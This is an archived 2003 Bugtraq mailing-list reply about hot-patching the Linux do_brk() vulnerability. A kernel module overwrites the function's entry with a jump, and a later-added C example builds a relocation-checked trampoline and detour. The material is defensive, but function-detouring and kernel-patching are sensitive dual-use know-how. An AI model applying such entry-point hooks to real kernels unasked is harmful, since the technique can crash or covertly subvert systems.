11077131 2003-12-09 11:59 -0800 /59 lines/ <canon@nersc.gov>
Imported: 2003-12-10 01:56 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <30258>
Comment to text 11070717 by Pavel harry_x Palát <harry_x@babylon5.cz>
Subject: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: canon@nersc.gov
To: bugtraq@securityfocus.com
Message-ID: <200312091959.hB9JxiOr006857@pookie.nersc.gov>

I had a similar approach working, but was still tweaking the
implementation. You beat me to the punch. Doh!

My working version did an objdump of vmlinux to determine the opcode
boundaries. One potential flaw in this approach is that the instructions
that are over-written by the jump and copied to the assembler routine
(dobrk2) can't include any operations that have relative addresses or
offsets. Fortunately, this seems quite rare from a brief scan of various
kernel routines. However, it's probably worth checking the assembler
routine before issuing the module load.

I still think this is a better approach than my initial version that
"fixed" calls and jumps. Nice work.

--Shane

> > It would be less intrusive to the kernel to supply a fixed do_brk()
> > and replace the do_brk with a jump to your version.
>
> I've written a similar patch a few days ago. The patch only modifies the
> first instructions of do_brk() (it replaces them with a jmp to a function
> in the LKM).
> It can be downloaded from http://wizard.ath.cx/fixbrk.tar.gz
>
> But beware, I wrote it in a rush and it's pretty oddly written :-) But it
> worked on my two servers (both were running the 2.4.21 kernel with the
> grsecurity patch).
>
> Greetings
>
> Pavel Palát
>
> --
> Pavel "harry_x" Palát
> harry_x@babylon5.cz
> irc: #mistral.cz on IRCnet
>
> The only way of finding the limits to the possible is by going beyond them to the impossible
> Arthur C. Clark
>

------------------------------------------------------------------------
Shane Canon                                     voice: 510-486-6981
PSDF Project Lead                               fax:   510-486-7520
National Energy Research Scientific Computing Center
1 Cyclotron Road Mailstop 943-256
Berkeley, CA 94720
canon@nersc.gov
------------------------------------------------------------------------

(11077131) /<canon@nersc.gov>/
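Shane's caveat above applies to any entry-point hot fix of the kind Goetz and Pavel describe: the bytes displaced by the 5-byte jmp at the start of do_brk() are copied into a trampoline, so none of them may be a call, jmp or jcc whose operand is relative to eip. The following C program is an added example, not code from any poster or from fixbrk. It decodes only the handful of position-independent prologue forms typical of gcc output of the period (push r32, mov ebp,esp, sub esp,imm, xor r32,r32), refuses anything it does not recognise, and, when the prologue is safe, assembles the trampoline (displaced bytes plus a jmp back into the original function) and the 5-byte detour in user-space buffers. The sample prologues and the addresses DEMO_FUNC, DEMO_TRAMP and DEMO_HOOK are constructed for the demonstration and are not real kernel symbol values.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define DETOUR_LEN 5   /* size of an x86 "jmp rel32" */

/* Length of the instruction at code[0] if it is a position-independent prologue
 * form we are willing to relocate, else 0. Anything with an eip-relative operand
 * (e8 call, e9/eb jmp, 7x jcc) or not decoded here deliberately yields 0. */
size_t pi_insn_len(const unsigned char *code, size_t avail)
{
    unsigned char op;
    if (avail == 0)
        return 0;
    op = code[0];
    if (op >= 0x50 && op <= 0x57)                                /* push r32 (0x55 = push ebp) */
        return 1;
    if (avail >= 2 && op == 0x89 && code[1] == 0xe5)             /* mov ebp, esp */
        return 2;
    if (avail >= 2 && op == 0x31 && (code[1] & 0xc0) == 0xc0)    /* xor r32, r32 */
        return 2;
    if (avail >= 3 && op == 0x83 && code[1] == 0xec)             /* sub esp, imm8 */
        return 3;
    if (avail >= 6 && op == 0x81 && code[1] == 0xec)             /* sub esp, imm32 */
        return 6;
    return 0;
}

/* Prologue bytes (>= DETOUR_LEN, ending on an instruction boundary) that may be
 * copied verbatim, or -1 if a non-relocatable instruction is hit first. */
int relocatable_prologue_len(const unsigned char *code, size_t avail)
{
    size_t off = 0;
    while (off < DETOUR_LEN) {
        size_t n = pi_insn_len(code + off, avail - off);
        if (n == 0)
            return -1;
        off += n;
    }
    return (int)off;
}

/* Store the little-endian rel32 from the end of the jmp (jmp_end) to `to`. */
static void put_rel32(unsigned char *dst, uint32_t jmp_end, uint32_t to)
{
    uint32_t rel = to - jmp_end;        /* wraps mod 2^32, as the CPU computes it */
    dst[0] = (unsigned char)(rel & 0xff);
    dst[1] = (unsigned char)((rel >> 8) & 0xff);
    dst[2] = (unsigned char)((rel >> 16) & 0xff);
    dst[3] = (unsigned char)((rel >> 24) & 0xff);
}

/* Trampoline = displaced prologue bytes + "jmp func+len". Returns the stub
 * length, or -1 if the prologue cannot be relocated or `out` is too small. */
int build_trampoline(uint32_t func_addr, const unsigned char *code, size_t avail,
                     uint32_t tramp_addr, unsigned char *out, size_t out_cap)
{
    int len = relocatable_prologue_len(code, avail);
    if (len < 0 || (size_t)len + DETOUR_LEN > out_cap)
        return -1;
    memcpy(out, code, (size_t)len);
    out[len] = 0xe9;
    put_rel32(out + len + 1, tramp_addr + (uint32_t)len + DETOUR_LEN, func_addr + (uint32_t)len);
    return len + DETOUR_LEN;
}

/* The 5 bytes written over the function entry: "jmp hook_addr". */
void build_detour(uint32_t func_addr, uint32_t hook_addr, unsigned char out[DETOUR_LEN])
{
    out[0] = 0xe9;
    put_rel32(out + 1, func_addr + DETOUR_LEN, hook_addr);
}

/* Constructed sample prologues; the second has a call within the first 5 bytes. */
const unsigned char SAFE_PROLOGUE[8]   = {0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0x56, 0x53};
const unsigned char UNSAFE_PROLOGUE[8] = {0x55, 0x89, 0xe5, 0xe8, 0x00, 0x00, 0x00, 0x00};

/* Constructed demo addresses (hypothetical, not real kernel symbol values). */
#define DEMO_FUNC  0xC0130000u
#define DEMO_TRAMP 0xC8800000u
#define DEMO_HOOK  0xC8800100u

/* Byte i of the demo trampoline built from SAFE_PROLOGUE, or -1 if out of range. */
int demo_trampoline_byte(size_t i)
{
    unsigned char out[32];
    int n = build_trampoline(DEMO_FUNC, SAFE_PROLOGUE, sizeof SAFE_PROLOGUE, DEMO_TRAMP, out, sizeof out);
    return (n < 0 || i >= (size_t)n) ? -1 : out[i];
}

/* Byte i of the demo detour (DEMO_FUNC -> DEMO_HOOK), or -1 if out of range. */
int demo_detour_byte(size_t i)
{
    unsigned char out[DETOUR_LEN];
    build_detour(DEMO_FUNC, DEMO_HOOK, out);
    return i < DETOUR_LEN ? out[i] : -1;
}

int main(void)
{
    int i, n;
    printf("safe prologue: %d relocatable bytes; trampoline:",
           relocatable_prologue_len(SAFE_PROLOGUE, sizeof SAFE_PROLOGUE));
    for (i = 0; (n = demo_trampoline_byte((size_t)i)) >= 0; i++)
        printf(" %02x", n);
    printf("\nunsafe prologue: %d (refused, call inside the first 5 bytes)\n",
           relocatable_prologue_len(UNSAFE_PROLOGUE, sizeof UNSAFE_PROLOGUE));
    return 0;
}
```

The decoder is deliberately incomplete: any opcode it does not know, including every relative branch, makes relocatable_prologue_len() return -1, which is the "check the assembler routine before issuing the module load" step turned into a refusal to install rather than a visual inspection. The trampoline's back-jump targets func+len so that execution resumes exactly on the instruction boundary after the displaced bytes.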